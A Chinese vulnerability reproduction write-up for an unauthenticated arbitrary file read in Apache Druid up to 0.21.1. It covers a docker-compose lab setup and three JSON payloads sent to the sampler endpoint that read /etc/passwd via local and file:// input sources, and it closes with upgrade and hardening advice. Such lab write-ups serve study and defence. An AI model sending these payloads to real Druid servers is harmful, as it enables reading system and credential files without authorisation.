声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。
0x02 漏洞概述
Apache Druid 对用户指定的 HTTP InputSource 中的 URI 未做协议限制(可以传入 file:// 地址),并且 Apache Druid 的管理页面默认无需认证即可访问。因此,未经授权的远程攻击者可以通过构造恶意参数,读取 Druid 进程有权限访问的任意文件。
0x03 影响版本
Apache Druid <= 0.21.1
0x04 环境搭建
创建docker-compose.yml,内容如下:
docker-compose.yml
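# docker-compose.yml for the Apache Druid 0.21.1 lab described in this post
# (derived from the Druid docker tutorial linked at the end).  Indentation
# restored: the listing as pasted had lost all nesting and would not parse
# as a Compose file.
#
# NOTE(review): every `ports:` entry below publishes on all host interfaces,
# and the Druid console in this version needs no authentication.  For a
# deliberately vulnerable lab, bind to loopback instead (e.g.
# "127.0.0.1:8081:8081") or run the stack on an isolated network.
version: "2.2"

volumes:
  metadata_data: {}
  middle_var: {}
  historical_var: {}
  broker_var: {}
  coordinator_var: {}
  router_var: {}

services:
  postgres:
    container_name: postgres
    # unpinned tag; pin a specific version if the lab must be reproducible
    image: postgres:latest
    volumes:
      - metadata_data:/var/lib/postgresql/data
    environment:
      # must match druid_metadata_storage_connector_* in the `environment` file
      - POSTGRES_PASSWORD=FoolishPassword
      - POSTGRES_USER=druid
      - POSTGRES_DB=druid

  # Need 3.5 or later for container nodes
  zookeeper:
    container_name: zookeeper
    image: zookeeper:3.5
    environment:
      - ZOO_MY_ID=1

  coordinator:
    image: apache/druid:0.21.1
    container_name: coordinator
    volumes:
      - ./storage:/opt/data
      - coordinator_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
    ports:
      - "8081:8081"
    command:
      - coordinator
    env_file:
      - environment

  broker:
    image: apache/druid:0.21.1
    container_name: broker
    volumes:
      - broker_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8082:8082"
    command:
      - broker
    env_file:
      - environment

  historical:
    image: apache/druid:0.21.1
    container_name: historical
    volumes:
      - ./storage:/opt/data
      - historical_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8083:8083"
    command:
      - historical
    env_file:
      - environment

  middlemanager:
    image: apache/druid:0.21.1
    container_name: middlemanager
    volumes:
      - ./storage:/opt/data
      - middle_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8091:8091"
    command:
      - middleManager
    env_file:
      - environment

  router:
    image: apache/druid:0.21.1
    container_name: router
    volumes:
      - router_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8888:8888"
    command:
      - router
    # missing in the pasted listing; every other Druid service loads the
    # shared `environment` file (zookeeper host, metadata store), and the
    # router needs the same settings
    env_file:
      - environment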
再在同级目录下创建一个名为 environment 的文件(即 docker-compose.yml 中 env_file 所引用的文件),内容如下:
environment
# `environment` file loaded by the Druid services in docker-compose.yml via
# `env_file`.  Variables prefixed `druid_` are presumably mapped to Druid
# runtime properties by the image entrypoint (underscores becoming dots) —
# verify against the entrypoint script of the image version in use.
# Java tuning
DRUID_XMX=1g
DRUID_XMS=1g
DRUID_MAXNEWSIZE=250m
DRUID_NEWSIZE=250m
DRUID_MAXDIRECTMEMORYSIZE=6172m
# debug-level emitter logging is verbose; acceptable for a lab, not for a real node
druid_emitter_logging_logLevel=debug
druid_extensions_loadList=["druid-histogram", "druid-datasketches", "druid-lookups-cached-global", "postgresql-metadata-storage"]
druid_zk_service_host=zookeeper
# left empty; the host is carried by the connectURI below
druid_metadata_storage_host=
# NOTE(review): this line does not follow the `druid_*` form used by every
# other key here and is not needed for the InputSource file read described
# in this post.  Druid ships with server-side JavaScript disabled; leave it
# disabled and drop this line.
druid.javascript.enabled = true
druid_metadata_storage_type=postgresql
# credentials must match the POSTGRES_* values in docker-compose.yml
druid_metadata_storage_connector_connectURI=jdbc:postgresql://postgres:5432/druid
druid_metadata_storage_connector_user=druid
druid_metadata_storage_connector_password=FoolishPassword
druid_coordinator_balancer_strategy=cachingCost
druid_indexer_runner_javaOptsArray=["-server", "-Xmx1g", "-Xms1g", "-XX:MaxDirectMemorySize=4g", "-Duser.timezone=UTC", "-Dfile.encoding=UTF-8", "-Djava.util.logging.manager=org.apache.logging.log4j.jul.LogManager"]
druid_indexer_fork_property_druid_processing_buffer_sizeBytes=268435456
druid_storage_type=local
druid_storage_storageDirectory=/opt/data/segments
druid_indexer_logs_type=file
druid_indexer_logs_directory=/opt/data/indexing-logs
druid_processing_numThreads=2
druid_processing_numMergeBuffers=2
# inline log4j2 configuration; the Jetty request log is set to DEBUG so that
# HTTP requests to the sampler/indexer endpoints show up on the container console
DRUID_LOG4J=<?xml version="1.0" encoding="UTF-8" ?><Configuration status="WARN"><Appenders><Console name="Console" target="SYSTEM_OUT"><PatternLayout pattern="%d{ISO8601} %p [%t] %c - %m%n"/></Console></Appenders><Loggers><Root level="info"><AppenderRef ref="Console"/></Root><Logger name="org.apache.druid.jetty.RequestLog" additivity="false" level="DEBUG"><AppenderRef ref="Console"/></Logger></Loggers></Configuration>
执行 docker-compose up -d 后,访问 8081 端口(docker-compose.yml 中 coordinator 服务映射的端口)即可。
0x05 漏洞复现
点击 Load data,选择 http(s)://,再点击 Connect data。
在 URIs 中填写 file:///etc/passwd,然后点击 Load 按钮,页面会直接回显文件内容。
向接口/druid/indexer/v1/sampler以POST请求的方式发送以下数据。
{
"type": "index",
"spec": {
"ioConfig": {
"type": "index",
"inputSource": {
"type": "local",
"baseDir": "/etc/",
"filter": "passwd"
},
"inputFormat": {
"type": "json",
"keepNullColumns": true
}
},
"dataSchema": {
"dataSource": "sample",
"timestampSpec": {
"column": "timestamp",
"format": "iso",
"missingValue": "1970"
},
"dimensionsSpec": {}
}
},
"type": "index",
"tuningConfig": {
"type": "index"
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
或者使用 firehose 形式(旧版本使用,大约 0.15.0 左右):
{
"type": "index",
"spec": {
"ioConfig": {
"type": "index",
"firehose": {
"type": "local",
"baseDir": "/etc/",
"filter": "passwd"
}
},
"dataSchema": {
"dataSource": "sample",
"parser": {
"parseSpec": {
"format": "json",
"timestampSpec": {},
"dimensionsSpec": {}
}
}
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
或者使用网上流传的 payload:
{
"type": "index",
"spec": {
"type": "index",
"ioConfig": {
"type": "index",
"firehose": {
"type": "http",
"uris": ["file:///etc/passwd"]
}
},
"dataSchema": {
"dataSource": "sample",
"parser": {
"type": "string",
"parseSpec": {
"format": "regex",
"pattern": "(.*)",
"columns": ["a"],
"dimensionsSpec": {},
"timestampSpec": {
"column": "!!!_no_such_column_!!!",
"missingValue": "2010-01-01T00:00:00Z"
}
}
}
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
0x06 修复方式
升级至 Apache Druid 0.22.0 及以上版本;同时建议为 Druid 管理接口启用认证,并限制其网络暴露面,不要直接暴露在公网。
https://github.com/apache/druid/
参考链接:
https://www.freebuf.com/vuls/263276.html
https://druid.apache.org/docs/latest/tutorials/docker.html